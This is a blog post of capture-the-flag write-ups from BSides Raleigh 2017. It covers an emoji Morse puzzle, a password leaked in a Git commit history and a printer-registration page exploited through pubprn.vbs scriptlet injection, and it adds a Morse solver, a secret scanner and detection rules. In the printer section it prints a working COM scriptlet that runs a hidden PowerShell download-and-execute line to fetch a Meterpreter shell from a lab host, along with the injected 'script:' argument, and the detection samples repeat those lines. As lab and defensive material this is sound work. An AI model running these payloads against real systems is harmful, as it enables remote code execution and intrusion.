BSides Raleigh 2017 CTF Write-Ups

Taking some inspiration from my friend, Ray, I decided I’d write up some of the solutions to the various challenges I saw at this year’s BSides Raleigh CTF (capture-the-flag) events. And this time, I actually remembered to save some notes and screenshots!

This isn’t a record of every single challenge I saw, just a few that I thought were particularly interesting or noteworthy.

🆘.html

This was a simple one…which I like, because I suck at CTF crypto challenges. The page was just these emoji spread out:

😮😮 😮😮😑😮 😑😮😑😑 😑😑😑 😮😮😑 😑😮😑😮 😮😑 😑😮 😮😑😮 😮 😮😑 😑😮😮 😑 😮😮😮😮 😮😮 😮😮😮 😑 😮😮😮😮 😮 😮😮😑😮 😮😑😮😮 😮😑 😑😑😮 😮😮 😮😮😮 😑 😮😮😮😮 😮😮😮😑😑 😮😑 😑😮 😑😮 😮😮 😮😮😮😑 😮 😮😑😮 😮😮😮 😮😮😮😮😑 😮😑😮 😑😮😑😑 😮😮😑 😮😑😑😮 😑😮😑😮 😮😑 😮😮😮 😮 😑😮😮

So I noticed right off the bat that there were only two emoji being used: 😮 and 😑. My initial thought was maybe this was something in binary, but I was dissuaded from that because of the variable lengths of emoji strings.

The next thought was Morse code! So I copied the emojis into Sublime and did a find/replace for each character, to get this:

.. ..-. -.-- --- ..- -.-. .- -. .-. . .- -.. - .... .. ... - .... . ..-. .-.. .- --. .. ... - .... ...-- .- -. -. .. ...- . .-. ... ....- .-. -.-- ..- .--. -.-. .- ... . -..

Running that through a Morse code translator yielded the message:

IFYOUCANREADTHISTHEFLAGISTH3ANNIVERS4RYUPCASED

So naturally, the flag was TH3ANNIVERS4RY.
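The find/replace-then-translate steps above can be done in one short script. This is an added example, not code from the original post: it takes the two-symbol message exactly as it appeared on the challenge page, works out which symbol is the dot and which the dash by trying both assignments (the wrong one produces groups like "----" that are not valid Morse), and decodes the result. The `MORSE` table, the `CHALLENGE` constant and the function names are mine.

```python
import re

# International Morse code table, letters and digits only (the challenge used no punctuation).
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# The challenge page, copied verbatim: two distinct emoji, letter groups separated by spaces.
CHALLENGE = (
    "😮😮 😮😮😑😮 😑😮😑😑 😑😑😑 😮😮😑 😑😮😑😮 😮😑 😑😮 😮😑😮 😮 😮😑 😑😮😮 😑 "
    "😮😮😮😮 😮😮 😮😮😮 😑 😮😮😮😮 😮 😮😮😑😮 😮😑😮😮 😮😑 😑😑😮 😮😮 😮😮😮 😑 "
    "😮😮😮😮 😮😮😮😑😑 😮😑 😑😮 😑😮 😮😮 😮😮😮😑 😮 😮😑😮 😮😮😮 😮😮😮😮😑 😮😑😮 "
    "😑😮😑😑 😮😮😑 😮😑😑😮 😑😮😑😮 😮😑 😮😮😮 😮 😑😮😮"
)


def symbols(text):
    """Return the distinct non-space symbols in the message, in order of first appearance."""
    seen = []
    for ch in text:
        if not ch.isspace() and ch not in seen:
            seen.append(ch)
    return seen


def to_morse(text, dot, dash):
    """Rewrite the message as dots and dashes, given which symbol plays which role."""
    return "".join("." if ch == dot else "-" if ch == dash else ch for ch in text)


def decode_morse(morse):
    """Decode space-separated Morse groups; return None if any group is not a valid code."""
    out = []
    for group in morse.split():
        if group not in MORSE:
            return None
        out.append(MORSE[group])
    return "".join(out)


def solve(text):
    """Try both dot/dash assignments and return the (morse, plaintext) pair that decodes cleanly."""
    syms = symbols(text)
    if len(syms) != 2:
        raise ValueError(f"expected exactly two symbols, found {len(syms)}: {syms}")
    for dot, dash in ((syms[0], syms[1]), (syms[1], syms[0])):
        morse = to_morse(text, dot, dash)
        plain = decode_morse(morse)
        if plain is not None:
            return morse, plain
    raise ValueError("neither assignment decodes as Morse")


if __name__ == "__main__":
    morse, plain = solve(CHALLENGE)
    print(morse)
    print(plain)
```

The same `solve()` works for any two-symbol substitution of Morse (binary digits, two colours, two words), which is why it tries both assignments rather than assuming the more "dot-like" glyph is the dot.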

Eversec Github

This is another easy one, but something perfectly applicable to real-life appsec reviews and pentests.

One thing you should always do, in CTFs and in web app pentests, is check the HTML source for comments. Several of the pages on the main Eversec website had the following comment embedded near the end:

<!--
<a href="https://github.com/eversec-rocks/eversec-website"><img src="/images/express.svg"></a>
Hiding until we can figure out how Github badges work
-->

Following the link took us to Eversec’s Github page, which provides source code for Eversec’s website.

[Screenshot: 2017-10-29_13-57-41]

It’s always a good idea to check source code for things like hardcoded credentials, connection strings, or vulnerable version numbers.

Another important thing to check is the commit history for careless mistakes by developers.

[Screenshot: 2017-10-29_14-40-13]

The one labelled “lol didnt realize that would put my password on the internet” looks enticing.

[Screenshot: 2017-10-29_14-40-32]

And sure enough, there’s a flag! Important lesson for the devs out there: even if you realize you screwed up and delete sensitive info, your commit history can still betray you!
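The "commit history can still betray you" lesson is easy to turn into a check that runs before code is pushed. The following is an added example, not code from the post or from the Eversec repository: it parses the text that `git log -p --all` prints (newest commit first), reports every added line that matches a small set of secret patterns, and notes when a later commit removed that same line, which is exactly the "deleted but still in history" case. The `SAMPLE_LOG` text, its commit ids and the password value are constructed for the example; the pattern list is deliberately small compared with a real secret scanner.

```python
import re
import sys

# Secret patterns checked against ADDED diff lines. Constructed for this example;
# real scanners ship far larger rule sets.
PATTERNS = {
    "hardcoded credential": re.compile(
        r"(?i)\b(password|passwd|pwd|secret|api[_-]?key|token)\b\s*[:=]\s*['\"][^'\"]{4,}['\"]"),
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "aws access key id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}

# Constructed `git log -p --all` output (newest commit first). Ids and values are made up.
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
Author: Dev <dev@example.com>
Date:   Sun Oct 29 14:00:00 2017 -0400

    lol didnt realize that would put my password on the internet

diff --git a/config.js b/config.js
--- a/config.js
+++ b/config.js
@@ -1,4 +1,4 @@
 module.exports = {
   user: "webapp",
-  password: "Sup3rS3cret-EXAMPLE",
+  password: process.env.DB_PASSWORD,
 };

commit 1111111111111111111111111111111111111111
Author: Dev <dev@example.com>
Date:   Sun Oct 29 13:00:00 2017 -0400

    add database config

diff --git a/config.js b/config.js
new file mode 100644
--- /dev/null
+++ b/config.js
@@ -0,0 +1,4 @@
+module.exports = {
+  user: "webapp",
+  password: "Sup3rS3cret-EXAMPLE",
+};
"""


def parse_git_log(log_text):
    """Split `git log -p` output into [(commit_id, [(path, sign, text), ...]), ...].

    Only added ('+') and removed ('-') lines are kept; context, headers and
    commit messages are dropped. Order is preserved: newest commit first.
    """
    commits = []
    path = None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commits.append((line.split()[1], []))
            path = None
        elif line.startswith("+++ "):
            target = line[4:].strip()
            path = None if target == "/dev/null" else (target[2:] if target.startswith("b/") else target)
        elif path is not None and line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            commits[-1][1].append((path, line[0], line[1:]))
    return commits


def scan_history(log_text):
    """Report every added line that matches a secret pattern, in every commit.

    A later (newer) commit that removes the line is recorded in 'removed_in',
    but the finding stays: the secret is still retrievable from history.
    """
    commits = parse_git_log(log_text)
    findings = []
    for idx, (commit, changes) in enumerate(commits):
        for path, sign, text in changes:
            if sign != "+":
                continue
            for rule, pattern in PATTERNS.items():
                if pattern.search(text):
                    # Newer commits appear BEFORE this one in `git log` output.
                    removed_in = next((c for c, ch in commits[:idx] if (path, "-", text) in ch), None)
                    findings.append({"commit": commit, "path": path, "rule": rule,
                                     "line": text.strip(), "removed_in": removed_in})
    return findings


if __name__ == "__main__":
    # Pipe a real history in with:  git log -p --all | python scan_history.py
    log = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    for f in scan_history(log):
        status = f"removed in {f['removed_in'][:7]} but still in history" if f["removed_in"] else "still present"
        print(f"{f['commit'][:7]} {f['path']}: {f['rule']} ({status}): {f['line']}")
```

On the sample the scanner reports the password from the first commit and notes that the second commit removed it. The only real fix for a credential that has reached a public remote is to rotate it; rewriting history afterwards does not recall the clones and forks that already have it.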

While it didn’t help here, another good idea when pentesting web apps that have open source code available is to pull down all the directory and file names you find and make a wordlist out of them. Take this wordlist and use it with your web content brute-forcer of choice (I like dirb personally, but DirBuster and gobuster are also popular) to see if any pages are reachable that shouldn’t be.

While I didn’t have time to solve it, Gabe told me afterwards that checking the versions of various JS libraries in use was the key to finding another vulnerability and flag in the Eversec site.

Printer Registration

I was apparently one of the only people that solved this one. The vulnerable server hosted a page for registering domain printers and advertised that it used the pubprn.vbs admin script to do this.

[Screenshot: 2017-10-26_17-55-33]

Using the default “PrinterName” value yielded an interesting error message.

[Screenshot: 2017-10-26_17-55-20]

My first inclination was to probe for command injection and try to break out of the “CScript” command, but no combination of semi-colons, pipes, or ampersands seemed to help. Then EversecCTF tweeted out this little hint:

So I knew there must be something special about the pubprn.vbs script itself. After fumbling with the rather anemic TechNet documentation for pubprn.vbs, I turned up some better info via googling. A recent presentation by Casey Smith (@subTee) and Matt Nelson (@enigma0x3) showed how they abused pubprn.vbs to inject and have the system execute scriptlets for them (video and blog post).

According to the TechNet docs, the pubprn.vbs script is expecting two arguments: a server name and an LDAP path to the AD container where you want the printer published. But since it’s using the GetObject() method to read that second parameter, you can feed it COM scriptlets instead!

One of my favorite Metasploit modules for when I find command injection on web apps is “exploit/multi/script/web_delivery.” Coincidentally, Casey Smith is one of the contributors to that module too! It works similarly to the trusty old “exploit/multi/handler” module, except it starts up a web server to host your chosen exploit and generates a command for you to run on the machine, in your choice of PowerShell, Python, PHP, or Regsvr32 format.

[Screenshot: 2017-10-26_16-42-57]

Looking back at it now, the “Regsvr32” option actually generates a COM scriptlet like what I ended up writing myself, so I probably could’ve saved myself some trouble and just done that, lol. Oh well, I chose the “Powershell” target option, picked good old Windows x64 Meterpreter for the payload, and fired up the module. The bit at the end of the screenshot, where it says “Run the following command on the target machine,” is what I would put into my COM scriptlet.

[Screenshot: 2017-10-26_16-43-43]

Sadly, the blog post code is a little mangled and the Github repo with their proofs-of-concept is gone now, but it was still up when this CTF was going on and I was able to alter it and make a custom payload. I wrote this payload in a text editor, then saved it with a .png file extension. I don’t exactly remember why I did it that way, either, rather than just save it as some other type of file.

<?XML version="1.0"?>
<scriptlet>
<registration
   description="test"
   progid="test"
   version="1.00"
   classid="{BBBB4444-0000-0000-0000-0000FAADACDC}"
   remotable="true"
   >
</registration>
<script language="JScript">
<![CDATA[
   var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.0.52:8080/goM6mwsH')");
]]>
</script>
</scriptlet>


As you can see in the JScript portion of the payload, I created an ActiveX object and told it to run the PowerShell command generated by “exploit/multi/script/web_delivery”. All I had to do from there was go to the Print Registration page and enter the following into the Printer Name text box:

127.0.0.1 script:http://192.168.0.51:8000/hi.png

…and I had a shell on the box! And since it was running under the Administrator’s context, no priv-esc required. I found a few flags on the box and submitted for the points.
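From the defender’s side, the whole chain above leaves two clear marks in process-creation telemetry: a script host running pubprn.vbs with a second argument that is not an LDAP path (the GetObject() moniker abuse), and powershell.exe spawned by cscript.exe with download-and-execute flags. The following is an added example, not code from the post, the CTF, or any vendor: two detection checks run over a handful of constructed process-creation events in a Sysmon-like shape (`Image`, `ParentImage`, `CommandLine` keys are assumed; the events, paths and the `printsrv01` server name are made up, while the `127.0.0.1 script:http://192.168.0.51:8000/hi.png` argument and the PowerShell flags are the ones shown in the write-up).

```python
import re

SCRIPT_HOSTS = ("cscript.exe", "wscript.exe")

# PowerShell switches and cmdlets typical of a download-and-execute one-liner.
SUSPICIOUS_PS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-nop\b|downloadstring|\bIEX\b|invoke-expression)")


def _basename(path):
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _tokens(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def check_pubprn_args(event):
    """Flag a script host running pubprn.vbs whose second argument is not an LDAP:// path.

    pubprn.vbs passes that argument to GetObject(), which resolves any moniker,
    so a legitimate call always looks like:  pubprn.vbs <server> LDAP://CN=...
    An allow-list on the LDAP:// prefix is safer than a block-list of monikers.
    """
    if _basename(event["Image"]) not in SCRIPT_HOSTS:
        return None
    toks = _tokens(event["CommandLine"])
    idx = next((i for i, t in enumerate(toks) if _basename(t) == "pubprn.vbs"), None)
    if idx is None:
        return None
    args = toks[idx + 1:]
    if len(args) >= 2 and not args[1].upper().startswith("LDAP://"):
        return {"rule": "pubprn.vbs with non-LDAP container argument", "argument": args[1]}
    return None


def check_script_host_child(event):
    """Flag powershell.exe spawned by cscript/wscript with download-and-execute style flags."""
    if _basename(event.get("ParentImage", "")) not in SCRIPT_HOSTS:
        return None
    if _basename(event["Image"]) != "powershell.exe":
        return None
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_PS.finditer(event["CommandLine"])})
    if hits:
        return {"rule": "powershell spawned by script host", "indicators": hits}
    return None


def evaluate(events):
    """Run both checks over a list of events and return the alerts raised."""
    alerts = []
    for ev in events:
        for check in (check_pubprn_args, check_script_host_child):
            hit = check(ev)
            if hit:
                alerts.append({"event": ev["id"], **hit})
    return alerts


# Constructed process-creation events (not real logs). Event 1 is a legitimate
# printer publish, 2 and 3 are the two halves of the chain in the write-up, 4 is benign PowerShell.
SAMPLE_EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'cscript.exe //nologo C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs '
                    r'printsrv01 "LDAP://CN=Printers,DC=example,DC=local"'},
    {"id": 2, "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"cscript.exe //nologo C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs "
                    r"127.0.0.1 script:http://192.168.0.51:8000/hi.png"},
    {"id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c $B=new-object net.webclient;"
                    r"IEX $B.downloadstring('http://192.168.0.52:8080/goM6mwsH')"},
    {"id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The same `LDAP://` allow-list that `check_pubprn_args` applies after the fact is what the registration page should have enforced before ever handing user input to pubprn.vbs; the detection rule is the backstop for when an application does not.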

[Screenshot: 2017-10-26_16-44-09]

I ended up taking second place in the CTF, with @securisec claiming the #1 spot.ย  Since I’m good friends with the CTF organizers, I waived my claim to any prizes and let some of the other contestants take them.

Besides the CTF, I also had the pleasure of speaking on a panel about CTFs with my teammates from EverSec (Gabe Marshall, Clayton Dorsey, Ray Doyle, and Garrett Galloway) and Jordan Weins of Binary Ninja fame. The day before, I also managed to get a ticket to a small class that Jordan gave on binary reversing using Binary Ninja.

The other highlight of the conference was getting to meet Dr. Cliff Stoll himself, of The Cuckoo’s Egg fame, who delivered the keynote. Both the panel and keynote were allegedly recorded, so I’ll update this space with links if they ever upload them to YouTube.

[Photo: Me, Dr. Cliff Stoll, and Ray Doyle (@doylersec)]

